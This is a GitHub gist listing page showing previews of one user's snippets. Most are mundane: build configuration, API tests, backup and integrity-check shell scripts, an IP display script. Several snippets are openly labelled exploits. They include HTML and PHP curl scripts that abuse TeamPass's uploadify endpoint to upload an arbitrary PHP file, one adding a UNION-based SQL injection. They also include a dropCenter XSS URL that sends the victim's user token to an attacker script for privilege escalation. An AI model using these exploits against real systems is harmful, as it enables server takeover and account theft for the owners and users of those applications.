Skip to content

Instantly share code, notes, and snippets.

View leblanc-simon's full-sized avatar

Simon Leblanc leblanc-simon

21 followers · 4 following
View GitHub Profile
@leblanc-simon
leblanc-simon / build.properties
Created November 9, 2011 22:20
propel example bug with query_cache
# Project name
propel.project = OpenSondage
# Database driver
propel.database = mysql
propel.mysql.tableType = MyISAM
propel.mysql.tableEngineKeyword = ENGINE
propel.tablePrefix =
#################################################
@leblanc-simon
leblanc-simon / teampass_hack.html
Created March 12, 2012 10:03
Hack teampass
<html>
<head>
<title>Hack TeamPass</title>
</head>
<body>
<form action="http://teampass/includes/libraries/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="hidden" name="type_upload" value="import_items_from_csv" />
<input type="hidden" name="folder" value="/files" />
<input type="submit">
@leblanc-simon
leblanc-simon / hack_teampass.php
Created March 17, 2012 16:06
Hack teampass via curl
<?php
$url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/';
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php');
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@info.php',
'type_upload' => 'import_items_from_csv',
'folder' => '/nilsteampassnet-TeamPass-65f3167/files',
@leblanc-simon
leblanc-simon / hack_teampass.php
Created April 1, 2012 23:18
Hack last teampass version
<?php
$url = 'http://localhost/teampass/';
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\''));
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@info.php',
'type_upload' => 'import_items_from_csv',
'folder' => '/teampass/files',
@leblanc-simon
leblanc-simon / 401_test.py
Created July 31, 2012 19:21
HTTP status return with prestapyt
from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict
prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6')
prestashop.search('addresses') # 401 + 200 : OK, it's the first call
prestashop.get('addresses', 4) # 200 only: OK
prestashop.get('addresses', 6) # 200 only: OK
prestashop.search('orders') # 401 + 200 : NOK, it must be only 200
prestashop.get('orders', 2) # 200 only: OK
prestashop.get('orders', 5) # 200 only: OK
@leblanc-simon
leblanc-simon / shaarli_api_test.php
Last active December 20, 2015 13:19
Shaarli API usage and test
<?php
/*
Usage of API :
- Search / Get links :
* method: GET
* URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search)
* return: JSON (object or array)
* &key=[linkdate]:
@leblanc-simon
leblanc-simon / dropcenter_exploit.php
Last active December 21, 2015 11:49
XSS + privilege escalation
<?php
# Exploit Title: dropCenter all version : privilege escalation
# If this is the last version (after 2013-08-20), use permanent XSS to hack the website :
#
# - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22
#
# - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test("
#
# Date: 2013-08-02
# Author: leviathan
@leblanc-simon
leblanc-simon / backup_manthly.sh
Created February 6, 2014 00:49
Backup monthly the last BackupPC dump
#!/bin/bash
hosts="host1 host2 host3"
shares="home etc root"
base_path="/home/backup/"
month=`date +%m`
command_tar='sudo -u backuppc /usr/share/backuppc/bin/BackupPC_tarCreate -h %host% -n -1 -s /%share% . > '
for host in ${hosts}; do
@leblanc-simon
leblanc-simon / check_integrity.sh
Created February 8, 2014 01:02
#!/bin/bash
directory="/var/www/"
result="${directory}website-integrity/`date '+%Y-%m-%d'`.md5sum"
old_result="${directory}website-integrity/`date '+%Y-%m-%d' --date '1 days ago'`.md5sum"
website_directory="${directory}httpdocs/"
find ${website_directory} -type f -exec md5sum {} \; > ${result}
today=`md5sum ${result} | awk '{print $1}'`
@leblanc-simon
leblanc-simon / ip.php
Last active August 29, 2015 13:56
Simple IP visualisation
<?php
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
/**
* @see https://gist.github.com/cballou/2201933
*/
function getIp()
{
$ip_keys = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR');